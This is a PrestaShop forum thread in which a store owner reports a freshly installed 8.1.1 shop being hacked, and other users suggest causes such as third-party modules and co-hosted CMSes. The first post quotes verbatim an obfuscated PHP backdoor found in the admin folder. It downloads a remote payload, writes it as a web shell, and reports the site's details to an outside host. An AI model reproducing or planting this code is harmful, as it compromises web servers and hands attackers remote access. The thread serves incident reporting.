Jump to content

Fresh version of PS 8.1.1 hacked


Recommended Posts

We have been using Prestashop since 1.4 and we fondly remember those days, you could run a store without being worry of hacked files on a daily basis. These days, it seems,regardless of running the latest and most secure version (8.1.1), we are still getting hacked.

This morning we tried to access our brand new, fresh installed 8.1.1 version and is already hacked, we can access the FO yet not the BO, how can this happen? The .index file under admin folder contained this line of code:

$O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O__O00_OO0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O__O00_OO0;');$OOO_O00_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$url','$OO0O0_0_O_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x30\x30\x30\x5f"]($O0O0_O_0O_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f\x4f"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["\x70\x61\x74\x68"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'//\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x50\x48\x50\x5f\x53\x45\x4c\x46"]),\'\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'\\\\\\\\\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30\x5f"]();$O_0_O_OO00["\x73\x68\x65\x6c\x6c\x5f\x6c\x69\x6e\x6b"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cHM6Ly9sb3RlcmlhZ3JpbmdhLmNvbS9hYm91dC5waHA/NTIw\');if(isset(${"\x5f\x47\x45\x54"}["\x64\x65\x6c"])&&${"\x5f\x47\x45\x54"}["\x64\x65\x6c"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?><?php>

We enabled debug and it display the error attached in the image. We don't want to change eCommerce software but if we continue getting hacked then we may have no choice. Iwas able to restore the backoffice by uploading the entire missing files, which should not vanish in the first place.

 

screenshot(1).png

Link to comment
Share on other sites

Nothing, we even got a brand new server and installed just that version due to previous bad experiences with hacking. What the hacking does it to change the .htaccess and index.php. In this case we experienced today, it also deleted to files:

vendor/twig/twig/src/Environment.php
vendor/symfony/symfony/src/Symfony/Component/Cache/Traits/PhpFilesTrait.php

Once we uploaded them back into the server, we had the website back.

Link to comment
Share on other sites

14 minutes ago, endriu107 said:

What do you mean by fresh installation? You didn't have any third party theme and modules? In directory with shop you have any other sites, for example on wodrpress?

So pretty much, Prestashop can never have anything else from third parties, no themes, not add-ons, regardless if they come from the official store, without risking being hacked?

Link to comment
Share on other sites

It's not like that, I just want to know if there are any other possibilities that someone hacked your store. In most cases are third party modules, also those added with some themes. Many time I see hacked stores because on same directory people have installed other cms like WP. If it's not in your case, best option now is look in server log and check what process maded those changes in files.

Link to comment
Share on other sites

7 minutes ago, endriu107 said:

It's not like that, I just want to know if there are any other possibilities that someone hacked your store. In most cases are third party modules, also those added with some themes. Many time I see hacked stores because on same directory people have installed other cms like WP. If it's not in your case, best option now is look in server log and check what process made those changes in files.

Understood, so what would be the best practice in case I'd live to have more cms installed? I see a server like a hotel right, you got the different domains (rooms) inside, and inside those rooms you have different cms correct? So, let's say I break into the hotel, I may be able to access the rooms that are not locked in, but the ones that are locked in, well, I cannot break in that easily. So, what would be the best practice to run several cms's within one server?

P.S. I am going to check the server logs and post the events here, I saw some activity (last modified) on folders and files through ftp around 4:28 am.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...